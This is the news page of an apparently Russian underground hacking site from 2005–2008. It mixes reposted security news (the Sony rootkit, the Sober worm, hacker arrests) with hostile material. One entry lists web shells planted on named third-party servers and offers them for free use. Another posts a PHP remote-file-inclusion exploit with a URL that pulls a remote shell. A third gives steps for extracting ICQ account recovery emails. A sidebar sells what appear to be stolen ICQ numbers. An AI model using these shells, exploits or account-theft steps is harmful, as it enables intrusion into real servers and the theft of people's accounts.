Security Archive by Death Scorpion


Основное меню
::Главная::
::О проекте::
::Статьи::
::E-Zines::
::Библиотека::
::Скачать::
::Друзья::
::Каталог сайтов::
::Наши релизы::
::Гостевая::

Рейтинги




Яндекс цитирования

Rambler's Top100



Новости из Underground - мира


08.12.2008 21:15:17

Наша статья

n4n0bit написал статью "Теория и практика PHP - injection". Прочитать статью можно здесь, а обсудить здесь.

Новость добавил Death Scorpion
07.12.2008 17:56:43

Наша статья

MAKS написал продолжение статьи про Локальный взлом Linux. Прочитать статью можно здесь, а обсудить тут.

Новость добавил Death Scorpion
22.01.2006 17:08:16

На халяву прокси и web-шелллы

http://isil-wood.iatp.by/admin/shel.php
http://upload.die-psychos.com/sponsoren/file_handle.php
http://isil-wood.iatp.by/admin/phproxy.php
http://isil-wood.iatp.by/admin/shel.php
http://toby.org.uk/phpMyWebmin/shel.php
http://phpmywebminpro.josh.ch/02/_data/languages/german.php
http://phpmywebminpro.josh.ch/03/_main_help.php
http://phpmywebminpro.josh.ch/01/_robot.php
http://phpmywebminpro.josh.ch/03/_main_header.php
http://www.oerangoetan.nl/_template.php
http://hwzone.co.il/phpshell.php
http://hwzone.co.il/phpMyWebmin/_template.php

Источник http://n4n0bit.by.ru

Новость добавил n4n0bit
01.01.2006 19:08:13

Наша статья

MAKS написал новую статью "Локальный взлом Linux (Часть Первая)". В ней описываются варианты получения файлов с паролями, когда есть физический доступ к компьютеру. Прочитать статью можно здесь, а обсудить тут.

Новость добавил Death Scorpion
24.12.2005 15:32:02

обнаружен php-inlude TagminControl Center 2.1.B Build 2

Не безопасно объявлена переменная $page в сценарии index.php,
что подвергает выполнить произвольный код на удаленной системе.

vuln_c0d3 :

<?php
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

3x4ml35 :

http://[target]/index.php?page=http://shell.gov/cmd

http://n4n0bit.by.ru

Новость добавил n4n0bit
21.12.2005 01:11:28

Найдено 2 новые уязвимости в скриптах

Уязвимости обнаружены в скриптах JV2 Folder Gallery 1.0 (Эта уязвимость носит слабый хорактер опасности. Она позволяет просматривать листинг каталогов и все:)) и @lex GuestBook 3.31 (Переменная 'skin' ссылается на существующий каталог 'шкуры'. Указав несуществующий мы получим ошибку и установочный путь скрипта...) Более подробно с уязвимостями можно ознакомиться тут: http://n4n0bit.by.ru

Новость добавил n4n0bit
14.12.2005 22:25:11

SMS-"самоубийцы" бесполезны?

Британская компания Staellium предложила услугу по самоуничтожению полученных SMS-сообщений. По мнению разработчиков, сервис будет востребован отправителями информации - от бизнесменов до неверных супругов. Однако российские эксперты полагают, что реальная полезность данной технологии весьма сомнительна.

Получатель часто не удаляет конфиденциальное сообщение со своего телефона по забывчивости или злому умыслу. Как пример уязвимости отправителя можно привести футболиста Дэвида Бэкхема. Его SMS-сообщения бывшая любовница представила журналистам в качестве доказательства их связи. Согласно Staellium, теперь отправитель информации может не беспокоиться за ее сохранность. Адресат получает текстовое уведомление, в котором указывается имя отправителя и содержится ссылка на само сообщение, находящееся на сервере. Через 40 секунд после открытия полученные SMS становятся недоступны и уничтожаются. Записи о них еще некоторое время хранятся в связи с требованиями органов безопасности.

Подписка на услугу, получившую название StealthText, стоит £5 за 10 сообщений. Пока сервис доступен только пользователям британских SIM-карт. Телефон пользователя, желающего подключить услугу, должен поддерживать WAP. Для подписки достаточно отправить слово STEALTH на номер 80880.

"Способность сообщений к самоуничтожению будет полезна многим пользователям, начиная от рядовых и заканчивая бизнесменами, - заявляет Кэрол Барнум (Carole Barnum), исполнительный директор и сооснователь Staellium. - Это только начало. Весной 2006 г. мы предложим аналогичные сервисы для электронных писем, голосовых сообщений и изображений. В результате пользователи получат гарантию, что их тексты и картинки не попадут в чужие руки". В дальнейшем в Staellium планируют предоставлять услугу в Европе, а затем в США и Азии.

«По популярности службу SMS уже сегодня можно поставить в один ряд с другими услугами мобильной связи, - говорит Денис Зенкин, директор по маркетингу InfoWatch. - Многие абоненты доверяют таким сообщениям не только каждодневный «треп», но и серьезную информацию весьма конфиденциального характера. Более того, в интернете то и дело всплывают смешные случаи, фигурантами которых оказываются, в основном, неверные супруги. Несомненно, новая услуга Staellium будет пользоваться спросом по всему миру. В России пока что ничего подобного не существует, но, уверен, ее появления уже ждут многие».

Однако другие российские эксперты подвергают полезность такой технологии сомнению. "Я не думаю, что содержание SMS-сообщений может быть использовано злоумышленниками, - заявил CNews замдиректора компании "Информзащита" Михаил Савельев. - SMS - удел молодежи, бизнесмены этой услугой пользуются редко. С огромным трудом представляю, что секретного можно передать через SMS. Например, я иногда таким путем передаю и получаю номера телефонов, адреса, другие контакты, необходимые для деловой встречи. Но в этом случае я совсем не хочу, чтобы эта информация "умерла". Анонимное сообщение при желании всегда можно послать через сайт оператора. Мне данный сервис представляется вырожденным". По мнению г-на Савельева, в России услуга Staellium может иметь ценность только как рекламный ход оператора связи, а заинтересуются ею только те 5% потребителей, которые всегда пробуют все новинки.

Также, по мнению эксперта, маловероятно, что такая услуга облегчит утрату потерявшим мобильник. В данном случае наиболее значимой потерей является сам аппарат и записная книжка, а не SMS.

Возможно, самоуничтожение получаемых SMS доставит некоторые трудности родителям, которые контролируют своих несовершеннолетних детей. Обычно они читают сообщения в телефоне, теперь им придется постоянно брать выписку со счета и проверять, кто и с какого номера направил ребенку SMS.

Отметим, что технология самоуничтожения полученной информации уже разработана в отношении электронной почты. В частности, такой продукт есть у Microsoft.
Источник: http://www.cnews.ru/

Новость добавил Death Scorpion
11.12.2005 12:11:18

Новый баг в асе

В асе появился новый баг.
Можно узнать примари для любого уина.
Работает он так:
1) Записываем в поиск по уину асю
2) Жмем несколько раз поиск
3) В поле мыло выскочит примари
P.S. У меня все работало на 5 асе

Новость добавил MAKS
10.12.2005 13:51:36

Наша статья

MAKS написал новую статью "Взлом дилера". В ней автор рассказывает о том, как используя практически только СИ (социальную инженерию) он получил доступ к базе данных сотового дилера. Прочитать статью можно здесь, а обсудить тут.

Новость добавил Death Scorpion
08.12.2005 22:20:23

Нацисты написали своего червя?

Червь Sober был написан нацистами для того, чтобы пропагандировать 78-ю годовщину основания Нацистской партии, утверждают в компании iDefence, специализиующейся на ИТ-безопасности.

Изучив код червя, специалисты обнаружили там скрытую функцию: 5 января 2006 года, в годовщину основания партии, зараженные машины должны распространить массу расистских и нацистских лозунгов и высказываний.

В интернете существует более 30 вариантов вируса Sober. В iDefence утверждают, что они были написаны человеком или группой, говорящей по-немецки.
Источник: http://www.cnews.ru/

Новость добавил Death Scorpion
08.12.2005 16:40:42

Вышел FDS e-zine #6

Содержание номера:

00. Introduction
01. Lock directory
02. Introduction to system limits
03. Full access to the disk partitions(win)
04. Elite kungfu
05. Shadow disk
06. Customizing FreeBSD loader with 4th
07. Acm 1/4 kz subregion
08. Close words

Скачать язык русский

Новость добавил Death Scorpion
06.12.2005 07:52:13

Вышла газета Сyberinfo Номер 6

В ней содержиться:
Интернет:
1.Где разместить сайт?
2.Логи друзья Хакера

Кодинг
1.Взлом паролей

Игра
1.Civilization 4

FAQ
1.FAQ по ICQ-хакингу

Взлом
1.Сканируй по уму
2.Четыре главных мифа компьютерной безопасности
3.Вся правда об ICQ Хакинге
4.Проникновение в Rambler.ru

СОФТ
1.Сети нового поколения и технология SOFTSWITCH
2.Сканер уязвимостей XSPIDER 7
3.Раслабительное для АДМИНОВ

Разное
1.Вечерина CYBERINFO
2.Победители CYBERINFO

Юмор
1.Анекдоты

ТОП-10
1.Они вершили историю: десятка самых влиятельных компьютерщиков

Beta - версия

Новость добавил MAKS
03.12.2005 20:55:14

Вышел Mazafaka.Ru E-zine #4

В этом номере:
[0] Intro
[1] News
[2] Chaos Construction 2005 (by said)
[3] LinuxLand/SoftTool 2005 (by Death Scorpion & m0zg)
[4] Удалённая установка RAdmin\'a (by eXp.l0ziv)
[5] Proxy Detection (by said)
[6] Построение сайта. Обзор слабых мест. (by PoizOn)
[7] Взлом сайта uzlovaya.ru
[8] Crypto Doors vol.1 (by said)
[9] СИ в новом свете (by PoizOn)
[10] Carding с самого начала (by m1g)
[11] Способы обхода Антизайцев (by Death Scorpion)
[12] Интервью с POZITRON (by Death Scorpion)
[13] Интервью с CyberLords community (by k1ll)
[14] Интервью с ЗАРАЗА (by Death Scorpion)
[15] Интервью с Terabyte (web-hack.ru) (by said)
[16] Mazafaka.Ru от зачатия до наших дней (by $t4lk3r)
[17] Методы и алгоритмы шифрования информации на PHP (by m0zg)
[00] Outro
Полная версия
Легкая версия (без музыки)

Новость добавил Death Scorpion
14.11.2005 16:57:55

Sony погрязла в шпионском скандале

На следующий день после появления в Сети эксплойта для скандально известной защиты музыкальных компакт-дисков компания Sony решила приостановить продажу защищенных CD.

По словам представителя Sony Джона Маккея (John McKay), производство компакт-дисков, защищенных программой ХСР (Extended Copy Protection), временно приостановлено. Он не сообщил, когда в компании планируют возобновить производство защищенных ХСР дисков, однако разработчики защиты ранее заявили, что они работают над новой версией, в которой не будут использоваться приемы маскировки файлов, применявшиеся в исходной версии.

Защита ХСР была разработана для Sony английской компанией First 4 Internet. Продажа защищенных ею дисков началась в начале 2005 года, а всего было выпущено около 20 таких альбомов. Детище First 4 Internet было призвано ограничить число возможных попыток копирования компакт-диска. Впервые скандальную известность данная защита получила две недели назад, когда эксперт по ОС Windows Марк Руссинович (Mark Russinovich) обнаружил, что ХСР использует приемы шпионских программ — так называемых руткитов — для маскировки своего присутствия на компьютере. По мнению г-на Руссиновича, в случае с этой защитой «контроль за авторскими правами на цифровых носителях (технология DRM от Sony) зашел слишком далеко». Критике подверглось также то, что программа не предупреждает пользователей о своей практически полной «невидимости» и чрезвычайной сложности удаления.

Вслед за этим Sony выпустила патч, демаскирующий файлы программы, однако этот шаг не разрешил проблему.

Руткиты — шпионские программы, которые различными способами получают доступ к системе, а затем скрывают следы своего присутствия так, чтобы не быть обнаруженными системными утилитами и антивирусным ПО. По убеждению г-на Руссиновича и других компьютерных экспертов, хакеры потенциально могли воспользоваться маскировочными приемами ХСР, чтобы скрыть свои вредоносные программы от антивирусного ПО.

Этот потенциал реализован: в интернете появились первые «трояны», действующие на основе ХСР. Фирма-производитель защитного ПО Sophos в своем отчете описывает один из «троянов», рассылаемых в спаме, — Troj/Stinx-E, который замаскирован под фотографию, отправленную английским деловым журналом. При нажатии на фотографию «троян» прячется в системе, пользуясь руткитом Sony.

Электронное письмо имеет следующее содержание: «Здравствуйте! Ваш фотограф отправил нам часть статьи для опубликования в декабрьском выпуске Total Business Monthly. Пожалуйста, проверьте ее формат и подтвердите его либо внесите изменения. Если фотография вас не устраивает, просим прислать другую. К письму приложен фотоснимок статьи».

При запуске вложенной в письмо программы «троян» копируется в файл $sys$drv.exe на атакованном компьютере. При этом любой файл, содержащий в начале своего имени подстроку $sys$, автоматически маскируется защитным кодом ХСР и становится невидимым на компьютерах, где для воспроизведения музыкальных дисков Sony устанавливалась эта защита.

«С помощью данного руткита на музыкальных CD троян становится невидимым и может отключить антивирусное ПО и перехватить контроль над компьютером под управлением ОС Windows, — считает старший консультант Sophos Грэм Клули (Graham Cluley). — Мы ожидали, что нечто подобное произойдет, так как после обнаружения руткита хакеры без труда могли атаковать компьютеры своим собственным кодом».

По словам г-на Клули, Sophos вскоре выпустит инструмент, помогающий обнаружить технологию управления авторскими правами на цифровых носителях (DRM) от Sony, отключить ее и предотвратить реинсталляцию защиты. «Благие намерения Sony по борьбе с музыкальным пиратством в результате плохой реализации вылились в создание бреши в системе, открытой для хакеров», — говорит г-н Клули. По его словам, Sophos работает совместно с Sony и разработчиком защиты, компанией First 4 Internet, над созданием заплатки.

«Троян» появился вслед за скандалом вокруг использования Sony шпионских приемов для защиты компакт-дисков. В Калифорнии к компании предъявлен групповой иск по данному вопросу, а еще один аналогичный иск готовится в штате Нью-Йорк. Также циркулируют слухи о бойкоте лейбла Sony BMG.

Sony обвиняют в заимствовании приемов хакеров и распространителей шпионского ПО, с помощью которых те маскируют свои действия. Защита ХСР предназначена для ограничения числа копий CD, но одновременно с этим создает брешь в системе защиты, позволяет следить за действиями пользователя пораженного ПК и отправлять эту информацию Sony.
Источник: http://www.cnews.ru/

Новость добавил Death Scorpion
12.11.2005 16:47:00

Будущими жертвами хакеров станут обладателей смартфонов

В настоящее время более половины всех хакерских атак носят ярко выраженный корыстный характер и направлены на взлом банковских счетов или получение не доступной иным путем информации. По прогнозам, общее число подобных случаев будет увеличиваться в ближайшее десятилетие. Среди жертв – как домашние пользователи, так и крупные корпорации. Если 10 лет назад первые хакеры рассылали вирусы из чисто хулиганских соображений, то сейчас ситуация резко изменилась. Общий ежегодный ущерб мировой экономике от хакеров, по самым скромным подсчетам, оценивается в $1 млрд. Были случаи, когда отдельным лицам удавалось взламывать банковские счета на сумму около $500 млн. Хакерство в наши дни — не просто далеко зашедшая школьное любопытство, но и возможность эффективного и скорого обогащения. В ЛК наиболее вероятными будущими жертвами хакеров называют обладателей смартфонов, а также жильцов квартир с автоматизированными бытовыми устройствами, подключенными к компьютерной сети (так называемые «умные дома»).
Источник: http://www.km.ru/

Новость добавил Death Scorpion
28.10.2005 18:30:05

Хакеры из "Thr34t-Krew" арестованы

Эндрю Харвей и Джордан Брэдли, члены британской хакерской группы "Thr34t-Krew", приговорены к тюремному заключению: ребята получили шесть и три месяца тюрьмы соответственно.
Ими была создана троянская программа TKBot-A.

Источник: http://www.mazafaka.ru/

Новость добавил Death Scorpion
28.10.2005 17:02:45

Хакеры эксплуатируют проблему \"птичьего гриппа\"

Хакеры воспользовались распространением "птичьего гриппа" для запуска нового электронного вируса. Он относится к классической категории "троянского коня".

Вирус засылается через электронную почту под видом документа в формате Word, содержащего информацию о ситуации с "птичьим гриппом" в мире.
Источник: http://www.crime-research.ru/

Новость добавил Death Scorpion
25.10.2005 16:12:15

Вирусописатели сменили приоритеты

Вирусописатели стали меньше создавать вирусов для почтовых сервисов. Они взялись за создание вредоносных программ, распространяемых с помощью уязвимых веб-приложений. Также ожидается, что произойдет смещение акцента в поиске уязвимостей в традиционных системах — Windows/Unix и их приложений — в сторону сетевого оборудования и антивирусных продуктов. Согласно ежеквартальному обзору от "Лаборатории Касперского", сейчас наблюдается явное смещение внимания вирусописателей с почтовых и сетевых вирусов в сторону вредоносных программ, распространяемых при помощи уязвимых веб-приложений, основным из которых является Internet Explorer. Вследствие этого значительно увеличилось число взломов слабозащищенных сайтов с целью размещения на них эксплоитов для IE с последующей установкой троянских программ на компьютеры посетителей данных сайтов. Наиболее заметными и многочисленными примерами таких атак являлись постоянные взломы южнокорейских игровых порталов с размещением на них троянцев-шпионов, ворующих данные пользователей онлайн-игр Legend of Mir и Lineage. Не отставали от зарубежных хакеров и российские. Здесь троянцем, ради которого преимущественно и взламывались сайты, был небезызвестный LdPinch.
Источник: http://www.cnews.ru/

Новость добавил Death Scorpion
25.10.2005 16:01:30

УСБУ в Харьковской области задержало 4 взломщиков компьютерных сетей

С начала года Управление СБУ (УСБУ) в Харьковской области задержало четверых злоумышленников в сфере компьютерных технологий. Причем правонарушения были выявлены на начальной стадии, что позволило избежать тяжелых последствий и минимизировать убытки граждан и предприятий.

В частности, сообщает пресс-группа УСБУ в Харьковской области, на 2 года лишения свободы осужден 30-летний житель Харьковской обл., который, злоупотребляя доверием нескольких государственных и частных предприятий, куда его приглашали для наладки техники, получал коды доступа в Интернет и пользовался ими, нанося предприятиям финансовый ущерб.

В другом случае был задержан 20-летний студент одного из харьковских вузов, имеющий специальное образование. Будучи абонентом локальной сети, он использовал модуль перехвата паролей других абонентов и получал доступ к информации ряда физических и юридических лиц.

Аналогично действовал и еще один житель области, продавая затем перехваченные пароли своим знакомым (он нанес ущерб 15 физическим и юридическим лицам).

Помимо этого, задержан еще один 17-летний студент харьковского ВУЗа. Молодой «хакер» не только перехватывал пароли, но и, незаконно получив права администратора на сервере одной из провайдерских компаний, манипулировал переводом средств на оплату счетов за Интернет-услуги. В СБУ отмечают, что юноша основательно позаботился о своей безопасности, применяя целый ряд защитных приемов.
Источник: http://it.proua.com/

Новость добавил Death Scorpion
25.10.2005 15:56:56

Турчинов назвал главных "хакеров"

Экс-глава СБУ Александр Турчинов заявляет, что следствию известны заказчики вмешательства в работу сервера Центральной избирательной комиссии во время подсчета голосов на выборах Президента.

Об этом он заявил во вчерашнем вечернем телеэфире канала \"1+1\".

Отвечая на вопрос, известны ли заказчики в этом деле, Турчинов сказал: \"Известны. Все известно. Я хочу сказать, что и господин Кивалов, и другие соответствующие сотрудники ЦИК, и те, кто заказывал эти преступления, они сегодня должны работать со следствием и давать серьезные ответы уже, наверное, не следствию, а на скамье подсудимых\".

Турчинов полагает, что это до сих пор не делается, скорее всего, из-за того, что в настоящее время речь идет об амнистии для тех, кто сфальсифицировал выборы.

Также Турчинов добавил, что все материалы, касающиеся вмешательства в деятельность Центризбиркома, СБУ своевременно собрала и передала в Генеральную прокуратуру для предъявления обвинений.
Источник: http://www.korrespondent.net/

Новость добавил Death Scorpion
TBN.ru - СЕТЬ, ЖИВУЩАЯ ПО ПРАВИЛАМ
TBN.ru - СЕТЬ, ЖИВУЩАЯ ПО ПРАВИЛАМ


Последние статьи
Локальный взлом Linux (Часть 2)

WinXP - первый шаг к пустому винту

Anti-chat продолжение, или Nick Flooding II

Как обмануть Locker - самую распрастранненую прогу в компутерных клубах?

Пишем программу для анонимной отправки почты

Вирусная энциклопедия

Создание сетей "зомби"

Agnitum Outpost Firewall2 - руководство по настройке

Защищаем беспроводную сеть: руководство THG - Tom's Hardware Guide Russia

Справочник по CSS (в формате chm)

Чем нас ловят наши АТС

Кардинг с самого начала

Взлом дилера

Безопасность в Miranda IM

Курс Молодого Бойца Irc ( первый конект )

История развития Рунета

TOP 10 самых разыскиваемых хакеров в истории


Реклама

Генерал Власов

Последние UIN'ы
182751-3$
191498-3$
205424-3$
208182-2$
251972-2$
291750-3$
296111-7$
362632-10$
362749-2$
452032-4$
502743-3$
570364-2$
689378-3$
708676-3$
855047-2$
812019-4$
903974-4$
904593-2$
910724-2$
915657-2$
922836-2$
962857-2$
Купить


X